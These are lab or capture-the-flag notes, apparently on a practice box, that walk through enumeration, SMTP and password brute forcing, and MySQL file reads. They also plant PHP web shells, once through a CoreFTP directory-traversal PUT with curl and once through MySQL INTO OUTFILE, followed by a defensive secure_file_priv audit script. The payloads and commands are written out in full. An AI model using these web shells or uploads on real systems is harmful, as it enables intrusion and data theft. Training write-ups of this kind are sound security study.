# Recon

- Add domain to `/etc/hosts`
- Ping is a bit wonky, maybe the remote host is buggy?

![[images/Pasted image 20251020140702.png]]
![[images/Pasted image 20251020141402.png]]

- Light nmap scan with the `-Pn` flag

![[images/Pasted image 20251020141419.png]]

- Detailed nmap scan

![[images/Pasted image 20251020141759.png]]
![[images/Pasted image 20251020141836.png]]

- OS nmap scan
- UDP nmap scan
- Nmap scan with tracing: `--packet-trace -Pn -n --disable-arp-ping --reason`
- Dig fails

# Enumeration

- FTP null session attempts

![[images/Pasted image 20251020142003.png]]
![[images/Pasted image 20251020142011.png]]

- Try to pluck usernames with `smtp-user-enum`; `[email protected]` is in play

![[images/Pasted image 20251020142308.png]]

- Try to brute force SMTP with hydra: failure with the given `pws.list`

![[images/Pasted image 20251020142519.png]]

- Try again with `rockyou.txt`

![[images/Pasted image 20251020142544.png]]

- Try to get into FTP with `fiona:987654321`

![[images/Pasted image 20251020142938.png]]
![[images/Pasted image 20251020143625.png]]

- Grab all files with wget

![[images/Pasted image 20251020143255.png]]

- Looks like a dead end?

![[images/Pasted image 20251020143419.png]]

- Try to get into MySQL: got some TLS/SSL errors and needed to add the `--skip-ssl` flag

![[images/Pasted image 20251020143920.png]]
![[images/Pasted image 20251020144350.png]]
![[images/Pasted image 20251020144748.png]]

- Try to get into RDP: failures

![[images/Pasted image 20251020150254.png]]
![[images/Pasted image 20251020150308.png]]
![[images/Pasted image 20251020150659.png]]

- Attempt to crack the hash from MySQL with `-m 300` (the MySQL hash mode): too lengthy

![[images/Pasted image 20251020150907.png]]

- Try john; determine the format with `john --list=formats | grep -i mysql`

![[images/Pasted image 20251020151043.png]]

- Error

![[images/Pasted image 20251020151151.png]]

# Exploit - A

- Within MySQL, check `SHOW VARIABLES LIKE "secure_file_priv";`
- If the value is null, we can arbitrarily read from and write to the filesystem
- Now simply read the flag: `SELECT LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt");`

```mysql
SHOW VARIABLES LIKE "secure_file_priv";
SELECT LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt");
```

![[images/Pasted image 20251020202416.png]]

# Exploit - B

- CoreFTP version 2.0 build 725, based on the nmap scan and a doc in the FTP share

![[images/Pasted image 20251020151906.png]]

- Run `searchsploit` on `coreftp`, based on the files found in the FTP share

![[images/Pasted image 20251020151516.png]]

- Copy to the local directory with `searchsploit -m <module_name.txt>`

![[images/Pasted image 20251020151541.png]]

- PoC works

![[images/Pasted image 20251020182444.png]]

- Now let's try a PHP web shell
- Use directory traversal to place it in `/xampp/htdocs`
- The `Apache` directory is at `C:\xampp\htdocs\`

```bash
curl -k -X PUT -H "Host: <target_ip>" --basic -u fiona:987654321 --data-binary "<?php echo shell_exec($_GET["cmd"])?>" --path-as-is https://<target_ip>/../../../../../xampp/htdocs/shellx.php
```

![[images/Pasted image 20251020200434.png]]

- Running into an error with `shell_exec()`
- Read with HTTP

```bash
curl -w "\n" http://<target_ip>/shellx.php?cmd=type%20C:\users\administrator\desktop\flag.txt
```

![[images/Pasted image 20251020200820.png]]

# Exploit - C

- Use MySQL to write a file into the web root, then use it as a web shell: `SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php"`

```mysql
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php";
```

- Visit `https://<target_ip>:443/backdoor.php`
- Add arbitrary commands after `backdoor.php?cmd=`
- For example: `http://inlanefreight.htb/backdoor.php?cmd=dir%20C:\Users\Administrator\Desktop`
- Note Windows OS
- Or grab with curl via HTTP

```bash
curl -w "\n" http://<target_ip>/backdoor.php?cmd=type%20C:\\users\\administrator\\desktop\\flag.txt
```
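As an added defender-side example (not part of these lab notes), the script below audits the `[mysqld]` section of a `my.ini` for the `secure_file_priv` setting that Exploit A and Exploit C depend on, and flags a value that still lets `INTO OUTFILE` reach the XAMPP document root. It assumes XAMPP's default `C:\xampp\htdocs` web root and uses constructed INI fragments; MySQL/MariaDB treat an empty value as no restriction and the literal `NULL` as import/export disabled.

```python
import configparser
from pathlib import PureWindowsPath

# Constructed sample [mysqld] fragments, not copied from any real my.ini.
WEAK_INI = '[mysqld]\nport=3306\nsecure_file_priv=""\n'
HARDENED_INI = '[mysqld]\nport=3306\nsecure-file-priv="C:/xampp/mysql/export"\n'
DISABLED_INI = '[mysqld]\nport=3306\nsecure_file_priv=NULL\n'

# Assumed XAMPP default Apache DocumentRoot (the target of the INTO OUTFILE write).
WEB_ROOT = PureWindowsPath("C:/xampp/htdocs")


def secure_file_priv_value(ini_text):
    """Return the configured secure_file_priv as a string, or None when unset.
    Accepts both the dash and underscore spellings that MySQL/MariaDB allow."""
    cfg = configparser.ConfigParser(allow_no_value=True, strict=False,
                                    inline_comment_prefixes=("#",))
    cfg.read_string(ini_text)
    if "mysqld" not in cfg:
        return None
    for key, value in cfg["mysqld"].items():
        if key.replace("-", "_") == "secure_file_priv":
            return (value or "").strip().strip("\"'")
    return None


def audit_secure_file_priv(ini_text, web_root=WEB_ROOT):
    """Classify the setting: unset, disabled, unrestricted, exposes_webroot or restricted."""
    value = secure_file_priv_value(ini_text)
    if value is None:
        # Build default applies; confirm on the server with SHOW VARIABLES LIKE 'secure_file_priv'
        return "unset"
    if value.upper() == "NULL":
        return "disabled"        # LOAD_FILE / INTO OUTFILE are refused entirely
    if value == "":
        return "unrestricted"    # any path the mysqld service account can reach (flag.txt, htdocs)
    allowed = PureWindowsPath(value)
    if allowed == web_root or allowed in web_root.parents:
        return "exposes_webroot"  # a file can still be dropped under the Apache document root
    return "restricted"
```

Run it against the live server's `C:\xampp\mysql\bin\my.ini`, and cross-check with `SHOW VARIABLES LIKE 'secure_file_priv';`, since a missing key means the build's default is in effect.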